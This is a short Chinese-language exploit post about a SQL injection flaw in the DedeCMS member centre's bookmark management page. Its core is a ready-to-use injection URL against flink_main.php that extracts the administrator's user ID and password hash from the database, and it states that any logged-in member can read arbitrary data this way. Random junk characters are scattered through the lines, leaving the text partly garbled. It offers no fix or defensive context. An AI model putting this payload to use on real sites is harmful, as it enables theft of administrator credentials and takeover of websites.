DedeCMS会员中心SQL注射漏洞% X! Z* M5 x3 [ g- b4 f) x6 B+ X# _
需要magic_quotes_gpc = Off
) j; E1 }/ d* O$ v/ a$ u会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
5 p! M2 B, E2 E; I+ x3 b
' g3 N! s. z& G( x" a; wDedeCMS会员中心书签管理SQL注射漏洞/ e9 c u' a0 x+ J0 x5 n
成功利用该漏洞可获得管理员密码
, N! M; A! R% D$ b! I
- }6 @1 L7 w* d& E会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
% S% M- t5 g( N% `. q& X : g$ P7 z; x u5 f" p8 ?/ y
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r; Z3 M; U* G7 u! J
|